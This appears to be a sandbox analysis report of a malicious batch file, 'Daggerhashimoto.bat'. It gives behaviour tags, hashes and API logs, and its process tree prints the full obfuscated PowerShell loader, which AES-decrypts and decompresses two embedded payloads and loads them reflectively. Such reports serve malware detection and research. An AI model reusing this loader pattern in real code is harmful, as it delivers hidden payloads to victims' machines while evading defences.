
Daggerhashimoto.bat

NPKI Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API Anti_VM FTP Socket Escalate privileges DNS Code injection Sniff Audio Steal credential AntiDebug AntiVM
Category Machine Started Completed
FILE s1_win7_x6402 April 10, 2023, 9:42 a.m. April 10, 2023, 9:44 a.m.
Size 1.9MB
Type ASCII text, with very long lines, with no line terminators
MD5 1a378a4fa84181614b51d0a0de0ebcbc
SHA256 46b59b52430a375b31cd7fa0fc416d994279bd86ba1da8e58222be83a38b2f4b
CRC32 A0CBA8C7
ssdeep 24576:3JqGkcZdFmcyFxVUjQn+aE9BoFMyvqRS1lX+V1HEyESk/PHxCsOWVnFvFF64yEbK:Hd8Fz+94Igfnb5yPZccAw
Yara
  • NPKI_Zero - File included NPKI
  • anti_vm_detect - Possibly employs anti-virtualization techniques
  • Antivirus - Contains references to security software

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "cNUT" C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat

    3000
    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat

      612
      • Daggerhashimoto.bat.exe "C:\Users\test22\AppData\Local\Temp\Daggerhashimoto.bat.exe" $MBjw='SMCKsplMCKsiMCKstMCKs'.Replace('MCKs', '');$Zazk='CrMCKseaMCKsteMCKsDecMCKsryMCKspMCKstorMCKs'.Replace('MCKs', '');$pgyS='TMCKsraMCKsnMCKssfoMCKsrmMCKsFMCKsinMCKsalBMCKslocMCKskMCKs'.Replace('MCKs', '');$rnTg='LoaMCKsdMCKs'.Replace('MCKs', '');$yITi='MaMCKsinMCKsMoMCKsdMCKsuMCKsleMCKs'.Replace('MCKs', '');$byHR='InMCKsvMCKsokMCKseMCKs'.Replace('MCKs', '');$JJhF='ReaMCKsdMCKsLiMCKsneMCKssMCKs'.Replace('MCKs', '');$ddgl='FrMCKsomBMCKsasMCKse6MCKs4SMCKstMCKsrMCKsiMCKsnMCKsgMCKs'.Replace('MCKs', '');$Nzus='ChMCKsaMCKsnMCKsgMCKseExMCKstensMCKsioMCKsnMCKs'.Replace('MCKs', '');$qiSi='EnMCKstrMCKsyPMCKsoMCKsintMCKs'.Replace('MCKs', '');$KqEJ='GeMCKstCMCKsuMCKsrrenMCKstMCKsPrMCKsoMCKscessMCKs'.Replace('MCKs', '');$YUqa='FMCKsiMCKsrsMCKstMCKs'.Replace('MCKs', '');function VXISz($xJrBE){$UoLXN=[System.Security.Cryptography.Aes]::Create();$UoLXN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$UoLXN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$UoLXN.Key=[System.Convert]::$ddgl('fSbE/ELtQVO/Dxms7Zp6CXdDpMkm3eOggmV7ILPMdik=');$UoLXN.IV=[System.Convert]::$ddgl('m1sJUnjHj7LNCIVQjqF9xQ==');$HMveB=$UoLXN.$Zazk();$LvnIY=$HMveB.$pgyS($xJrBE,0,$xJrBE.Length);$HMveB.Dispose();$UoLXN.Dispose();$LvnIY;}function dZeca($xJrBE){$pwdAe=New-Object System.IO.MemoryStream(,$xJrBE);$kHODJ=New-Object System.IO.MemoryStream;$xUoxC=New-Object System.IO.Compression.GZipStream($pwdAe,[IO.Compression.CompressionMode]::Decompress);$xUoxC.CopyTo($kHODJ);$xUoxC.Dispose();$pwdAe.Dispose();$kHODJ.Dispose();$kHODJ.ToArray();}$DnbCX=[System.Linq.Enumerable]::$YUqa([System.IO.File]::$JJhF([System.IO.Path]::$Nzus([System.Diagnostics.Process]::$KqEJ().$yITi.FileName, $null)));$VdgtA=$DnbCX.Substring(3).$MBjw(':');$tdiJC=dZeca (VXISz ([Convert]::$ddgl($VdgtA[0])));$fSFdV=dZeca (VXISz 
([Convert]::$ddgl($VdgtA[1])));[System.Reflection.Assembly]::$rnTg([byte[]]$fSFdV).$qiSi.$byHR($null,$null);[System.Reflection.Assembly]::$rnTg([byte[]]$tdiJC).$qiSi.$byHR($null,$null);

        2376

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Unexpected token '(' in expression or statement.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At line:1 char:1006
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: + $MBjw='SMCKsplMCKsiMCKstMCKs'.Replace('MCKs', '');$Zazk='CrMCKseaMCKsteMCKsDe
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: cMCKsryMCKspMCKstorMCKs'.Replace('MCKs', '');$pgyS='TMCKsraMCKsnMCKssfoMCKsrmMC
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: KsFMCKsinMCKsalBMCKslocMCKskMCKs'.Replace('MCKs', '');$rnTg='LoaMCKsdMCKs'.Repl
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: ace('MCKs', '');$yITi='MaMCKsinMCKsMoMCKsdMCKsuMCKsleMCKs'.Replace('MCKs', '');
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: $byHR='InMCKsvMCKsokMCKseMCKs'.Replace('MCKs', '');$JJhF='ReaMCKsdMCKsLiMCKsneM
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: CKssMCKs'.Replace('MCKs', '');$ddgl='FrMCKsomBMCKsasMCKse6MCKs4SMCKstMCKsrMCKsi
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: MCKsnMCKsgMCKs'.Replace('MCKs', '');$Nzus='ChMCKsaMCKsnMCKsgMCKseExMCKstensMCKs
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ioMCKsnMCKs'.Replace('MCKs', '');$qiSi='EnMCKstrMCKsyPMCKsoMCKsintMCKs'.Replace
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ('MCKs', '');$KqEJ='GeMCKstCMCKsuMCKsrrenMCKstMCKsPrMCKsoMCKscessMCKs'.Replace(
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: 'MCKs', '');$YUqa='FMCKsiMCKsrsMCKstMCKs'.Replace('MCKs', '');function VXISz($x
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: JrBE){$UoLXN=[System.Security.Cryptography.Aes]::Create();$UoLXN.Mode=[System.S
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: ecurity.Cryptography.CipherMode]::CBC;$UoLXN.Padding=[System.Security.Cryptogra
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: phy.PaddingMode]::PKCS7;$UoLXN.Key=[System.Convert]::$ddgl( <<<< 'fSbE/ELtQVO/D
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: xms7Zp6CXdDpMkm3eOggmV7ILPMdik=');$UoLXN.IV=[System.Convert]::$ddgl('m1sJUnjHj7
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: LNCIVQjqF9xQ==');$HMveB=$UoLXN.$Zazk();$LvnIY=$HMveB.$pgyS($xJrBE,0,$xJrBE.Leng
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: th);$HMveB.Dispose();$UoLXN.Dispose();$LvnIY;}function dZeca($xJrBE){$pwdAe=New
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: -Object System.IO.MemoryStream(,$xJrBE);$kHODJ=New-Object System.IO.MemoryStrea
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: m;$xUoxC=New-Object System.IO.Compression.GZipStream($pwdAe,[IO.Compression.Com
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: pressionMode]::Decompress);$xUoxC.CopyTo($kHODJ);$xUoxC.Dispose();$pwdAe.Dispos
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: e();$kHODJ.Dispose();$kHODJ.ToArray();}$DnbCX=[System.Linq.Enumerable]::$YUqa([
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: System.IO.File]::$JJhF([System.IO.Path]::$Nzus([System.Diagnostics.Process]::$K
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: qEJ().$yITi.FileName, $null)));$VdgtA=$DnbCX.Substring(3).$MBjw(':');$tdiJC=dZe
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: ca (VXISz ([Convert]::$ddgl($VdgtA[0])));$fSFdV=dZeca (VXISz ([Convert]::$ddgl(
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: $VdgtA[1])));[System.Reflection.Assembly]::$rnTg([byte[]]$fSFdV).$qiSi.$byHR($n
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: ull,$null);[System.Reflection.Assembly]::$rnTg([byte[]]$tdiJC).$qiSi.$byHR($nul
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: l,$null);
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: ecordException
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : UnexpectedToken
console_handle: 0x0000018b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d258
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052da18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052d4d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052dc18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052ced8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0052ced8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056e5a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056eb28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056eb28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056eb28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0056dde8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73961000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73962000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02683000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02684000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a89000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8c000
